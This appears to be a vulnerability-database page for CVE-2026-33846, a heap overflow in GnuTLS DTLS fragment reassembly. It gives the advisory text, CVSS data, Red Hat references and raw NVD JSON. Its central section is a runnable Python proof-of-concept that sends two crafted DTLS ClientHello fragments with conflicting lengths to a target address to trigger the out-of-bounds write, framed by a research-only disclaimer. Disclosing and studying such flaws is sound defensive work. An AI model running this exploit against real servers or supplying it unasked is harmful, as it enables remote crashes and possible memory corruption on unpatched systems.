Security Vulnerability Report
中文
CVE-2026-33846 CVSS 7.5 HIGH

CVE-2026-33846

Published: 2026-05-04 10:16:00
Last Modified: 2026-05-04 15:22:53
Source: [email protected]

Description

A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

GnuTLS (具体受影响版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # Target configuration TARGET_IP = "192.168.1.100" TARGET_PORT = 4433 def create_dtls_record(content_type, version, epoch, sequence, fragment): """Helper to create a DTLS record layer header""" # Format: ContentType(1) + Version(2) + Epoch(2) + Sequence(6) + Length(2) # Note: Length is the length of the fragment header = struct.pack("!BHH", content_type, version, epoch) header += struct.pack("!Q", sequence)[2:] # Take last 6 bytes for sequence header += struct.pack("!H", len(fragment)) return header + fragment def create_handshake_fragment(msg_type, msg_len, msg_seq, frag_offset, frag_len, data): """Helper to create a Handshake protocol fragment""" # Format: Type(1) + Length(3) + MessageSeq(2) + FragmentOffset(3) + FragmentLength(3) header = struct.pack("!B", msg_type) header += struct.pack("!I", msg_len)[1:] # 24-bit length header += struct.pack("!H", msg_seq) header += struct.pack("!I", frag_offset)[1:] # 24-bit offset header += struct.pack("!I", frag_len)[1:] # 24-bit fragment length return header + data # Exploit logic sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # 1. Send initial fragment with small message_length (e.g., 10 bytes) # This tricks the allocator into reserving a small buffer. small_data = b"A" * 10 frag1 = create_handshake_fragment( msg_type=1, # ClientHello msg_len=10, # The declared total message length (small) msg_seq=0, frag_offset=0, frag_len=10, data=small_data ) record1 = create_dtls_record(22, 0xfefd, 0, 0, frag1) sock.sendto(record1, (TARGET_IP, TARGET_PORT)) print("[+] Sent Fragment 1 (Small allocation trigger)") # 2. Send subsequent fragment with inconsistent larger length # The implementation trusts the initial allocation but writes based on this large data. large_data = b"B" * 1000 frag2 = create_handshake_fragment( msg_type=1, # ClientHello (same type to match) msg_len=1010, # Conflicting larger total length msg_seq=0, frag_offset=10, frag_len=1000, data=large_data ) record2 = create_dtls_record(22, 0xfefd, 0, 0, frag2) sock.sendto(record2, (TARGET_IP, TARGET_PORT)) print("[+] Sent Fragment 2 (Heap overflow trigger)") print("[+] Exploit packets sent successfully.") except Exception as e: print(f"[-] Error: {e}") finally: sock.close()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33846", "sourceIdentifier": "[email protected]", "published": "2026-05-04T10:15:59.690", "lastModified": "2026-05-04T15:22:52.850", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-130"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:13274", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-33846", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.